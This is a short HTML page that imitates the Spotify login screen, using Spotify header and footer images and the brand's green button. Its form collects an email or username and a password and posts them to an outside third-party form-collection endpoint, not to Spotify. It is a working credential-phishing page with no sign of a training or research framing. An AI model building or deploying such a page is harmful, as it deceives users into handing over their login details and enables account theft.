
<!DOCTYPE html>
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<html>
    <head>
        <style>
            input {
                width: 31%;
                margin-top: 3px;
                padding: 10px;
                font-family: Avenir Next;
                font-size: 15px;
            }
            input[name=pass]{
                margin-top: 15px;
            }
            input[type=submit]{
                margin-top: 15px;
                width: 33%;
                padding: 10px;
                border-radius: 25px;
                background-color: #1db954;
                color: white;
            }
        </style>
    </head>
    <body>
        <img src="Spotifyheader.png" width="100%"><br>
        <div style="text-align: center">
            <form action="https://usebasin.com/f/7f657ca959a9">
                <input type="text" name="user" placeholder="Email address or username"><br>
                <input type="password" name="pass" placeholder="Password"><br>
                <input type="submit" name="submit" value="LOG IN">
            </form><br>
        </div>
        <img src="Spotifyfoot.png" width="100%">
    </body>
</html>